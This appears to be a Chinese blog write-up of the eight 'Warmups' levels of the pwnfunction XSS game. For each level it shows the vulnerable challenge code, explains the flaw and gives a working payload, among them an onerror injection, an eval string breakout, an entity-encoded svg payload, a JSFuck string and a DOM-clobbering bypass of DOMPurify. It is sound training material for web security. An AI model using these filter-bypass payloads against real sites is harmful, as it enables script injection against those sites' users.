xss game-Warmups

最新推荐文章于 2024-09-30 15:37:45 发布
最新推荐文章于 2024-09-30 15:37:45 发布
阅读量767 收藏 26
点赞数 21
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63706130/article/details/141390819
版权

场景:

xssgame靶场-Warmups部分

Warmups关卡通常用于帮助我们熟悉和理解基本的 XSS 攻击手法。通过这些入门关卡,我们可以学习如何在特定的 Web 应用场景下注入和执行恶意脚本。Warmups分为八关。

第一关Ma Spaghet!:

问题描述

  • Difficulty is Easy.
  • Pop an alert(1337) on sandbox.pwnfunction.com.
  • No user interaction.
  • Cannot use https://sandbox.pwnfunction.com/?html=&js=&css=.
  • Tested on Chrome.
<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

原因分析:

这段代码从 URL 的 somebody 参数获取值,并插入到页面的 innerHTML 中。GET 参数以不安全的方式somebody分配 spaghet.innerHTML

解决方案:

构建payload:

由于 innerHTML 将内容直接插入到 HTML 中,我们可以利用 <img> 标签和 onerror 事件来弹出 alert(1337)

<img src=x onerror="alert(1337)">

第二关Jefff: 

问题描述

  • Difficulty is Easy.
  • Pop an alert(1337) on sandbox.pwnfunction.com.
  • No user interaction.
  • Cannot use https://sandbox.pwnfunction.com/?html=&js=&css=.
  • Tested on Chrome.
<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

原因分析:

主要问题在于使用了 eval 来处理输入,应该避免使用 eval,并且在处理用户输入时进行适当验证。

解决方案:

get参数jeff位于 eval 内 eval(`ma = "Ma name ${jeff}"`),因此我们可以用双引号打破字符串并执行我们自己的代码。

?jeff="-alert(1337)-"

 

 

第三关Ugandan Knuckles: 

问题描述

  • Difficulty is Easy.
  • Pop an alert(1337) on sandbox.pwnfunction.com.
  • No user interaction.
  • Cannot use https://sandbox.pwnfunction.com/?html=&js=&css=.
  • Tested on Chrome.
<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

原因分析:

get 参数wey成为 的一部分uganda.innerHTML,但在此之前它会过滤掉一堆字符.

解决方案:

小于号 (<) 和大于号 (>) 字符被删除,这意味着我们无法创建新标签。但引号不会被删除,因此我们可以跳出placeholder 并注入一些属性。由于我们无法进行用户交互,我们可以使用 onfocus事件处理程序,然后自动聚焦输入触发代码

?wey=aaa"onfocus=alert(1337) autofocus="

 

 

第四关Ricardo Milos: 

问题描述

  • Difficulty is Easy.
  • Pop an alert(1337) on sandbox.pwnfunction.com.
  • No user interaction.
  • Cannot use https://sandbox.pwnfunction.com/?html=&js=&css=.
  • Tested on Chrome.
<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)
</script>

原因分析:

问题在于它允许通过 URL 参数来动态设置表单的 action,从而可能导致 XSS 攻击

解决方案:

ricardo.action通过 GET 参数设置为用户控制的输入 ricardo,并且表单自动提交

?ricardo=javascript:alert(1337)

 

第五关Ah That's Hawt: 

问题描述

  • Difficulty is Easy.
  • Pop an alert(1337) on sandbox.pwnfunction.com.
  • No user interaction.
  • Cannot use https://sandbox.pwnfunction.com/?html=&js=&css=.
  • Tested on Chrome.
<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '')
    will.innerHTML = smith
</script>

原因分析:

问题在于代码试图通过移除 (, \,  ` 等字符来防止恶意脚本注入,但它忽略了属性值可以使用 HTML 实体编码来逃避过滤

解决方案:

可以使用 HTML 实体编码来逃避过滤

 

?markassbrownlee=<svg%20onload%3D"%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x31%3B%26%23x33%3B%26%23x33%3B%26%23x37%3B%26%23x29%3B">

 

 ​

第六关Ligma: 

问题描述

  • Difficulty is Easy.
  • Pop an alert(1337) on sandbox.pwnfunction.com.
  • No user interaction.
  • Cannot use https://sandbox.pwnfunction.com/?html=&js=&css=.
  • Tested on Chrome.
/* Challenge */
balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)

原因分析:

问题在于代码仅删除字母和数字,但不处理如特殊字符。

解决方案:

由于过滤器只删除字母和数字,可以通过特殊字符绕过过滤器

?balls=%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)()

第七关Mafia: 

问题描述

  • Difficulty is Easy.
  • Pop an alert(1337) on sandbox.pwnfunction.com.
  • No user interaction.
  • Cannot use https://sandbox.pwnfunction.com/?html=&js=&css=.
  • Tested on Chrome.
/* Challenge */
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

原因分析:

过滤了部分字符和 alert 字符串,但仍有其他未被过滤的字符和函数可用来执行代码

  • 截取长度50的字符串
  • '"+-!\[]被替换为_
  • alert被替换为_

解决方案:

定义匿名函数,利用匿名函数的参数构造payload,同时使用正则表达式来绕过alert字符串的检测。

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

 

 

第八关Ok, Boomer: 

问题描述

  • Difficulty is Easy.
  • Pop an alert(1337) on sandbox.pwnfunction.com.
  • No user interaction.
  • Cannot use https://sandbox.pwnfunction.com/?html=&js=&css=.
  • Tested on Chrome.
<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

原因分析:

使用 DOMPurify.sanitize,会过滤入恶意 HTML 或 JavaScript 的尝试,通过 boomer 参数注入脚本,也会被清理。

解决方案:

可以使用DOM Clobbering的方式,通过向HTML注入DOM元素,来实现操作JavaScript变量

?boomer=<a%20id=ok%20href=mailto:alert(1337)>

·KABUTO·
关注
XSS线上靶场---Warmups
qq_52016943的博客
08-01 2389
XSS线上靶场
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
pwnfunction xssgame-easy writeup
susu_xi的博客
05-07 493
0x02 Jefff js获取到页面的jeff参数,并通过eval赋值给ma,再将ma复制到maname的text jeff中构造payload,用双引号去闭合ma的赋值,执行构造的alert,再将后面双引号闭合 构造如下语句: eval(`ma = "Ma name"[分隔符]alert(1337)[分隔符]""`) 即eval会执行两个语句—— ma = “Ma name” 、alert...
xss-靶场
小白
08-17 843
let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF"):获取查询参数 jeff 的值,若不存在则使用默认值 "JEFFF"。这个脚本的作用是将页面中 ID 为 maname 的 <h2> 元素的文本设置为 "Ma name " 后跟 URL 查询参数 jeff 的值,或者在没有该参数时使用默认值 "JEFFF"。这个脚本的作用是将页面中 ID 为 will 的 <h2> 元素的 innerHTML 设置为一个处理过的字符串。
XSSxss game
qq_68600196的博客
08-18 1129
至此,xss gameWarmups部分已结束!
XSS漏洞复现(包括xssgame和三个高级xss漏洞)
qq_63890458的博客
08-17 920
复现xss游戏里的8个简单模式,并且写有大概解题思路过程及原理。此外,还复现了两个DOM破坏的高级xss漏洞,利用的技巧很多,前端这种弱编程的变化太多了,原理性太不规律,需要很深的底层代码理解,才能找到漏洞,大家加油吧。
XSS Game前八关
m0_63050933的博客
08-16 637
分享一个XSS游戏的链接。
DOM破坏绕过XSSfilter例题
求大佬师傅带
08-29 662
DOM破坏结合XSS例题
复现dom破坏案例和靶场
moyuan_4s的博客
08-17 728
/ 回调函数中,将变量 `ma` 的值设置为具有 `id` 为 `maname` 的 `h2` 元素的文本内容。// 这行代码首先通过 `new URL(location)` 获取当前页面的 URL 对象,然后使用 `searchParams.get('jeff')` 尝试获取 URL 中名为 `jeff` 的查询参数的值。// 如果没有获取到该参数或者获取到的值为 `null` 或 `undefined`,则将 `jeff` 的值设置为 `"JEFFF"`。尝试闭合双引号,之后在其中闭合单引号。
DOM破坏
qjl3256413142的博客
08-17 774
XSS Game
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
Android 14源码分析】WMS-窗口显示-流程概览与应用端流程分析
最新发布
隔壁小王的博客
09-30 618
WMS 负责管理设备上所有的 Window ,所以应用想显示一个 Window 则要通过 WMS 来完成。而 WMS 毕竟还是上层,窗口的内容要显示到屏幕上,还需要 SurfaceFlinger 来处理。应用端: 控制其内部的窗口的添加及 UI 绘制逻辑WMS 模块: 作为系统窗口管理模块,处理应用端的窗口显示逻辑应用端与 WMS 通信通过匿名 Binder -> Session 完成。
技术速递|适用于 .NET 和 .NET MAUI Android 应用程序的 Android 资产包
MicrosoftReactor的博客
09-27 1262
早在 2018 年,Google 就推出了一种新的软件包格式,用于将 Android 应用程序部署到 Google Play Store。自 .NET 6 以来,.NET Android 就一直支持Android App Bundles (AAB)这种新格式。Android App Bundles 有很多功能,我们优先考虑了开发人员最需要的功能。AAB 格式的一项高级功能是资产包,它现在将成为 .NET 9 的一部分。那么什么是资产包呢?新软件包格式的一部分是可以将资产放入单独的软件包中。
windows10使用bat脚本安装前后端环境之msyql5.7安装配置并重置用户密码
风吹淡了悲伤
09-27 412
mysql-user-init.sql:重置root密码(并新增zhangsan用户授予权限)adserver-simple.sql:创建数据库sql脚本。5.启动并修改root密码(新增用户初始化授予权限)2.新增data文件夹与my.ini配置文件。1.下载mysql5.7 zip格式安装包。4.安装mysql windows服务。
AndroidStudio】关于AndroidStudio的常见控件TextView和Button
PleaSure乐事的博客
09-26 378
AndroidStudio中TextView和Button控件的使用
PHP反序列化2(OC绕过.wakeup绕过)
2302_81328699的博客
09-26 469
PHP反序列化2(OC绕过.wakeup绕过)
xss-labs-master靶场
09-29
xss-labs-master靶场是一个用于学习和实践跨站脚本攻击(Cross-Site Scripting,简称XSS)的实验环境。可以从GitHub上下载该靶场的源码,地址是https://github.com/do0dl3/xss-labs。在这个靶场中,你可以找到各种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值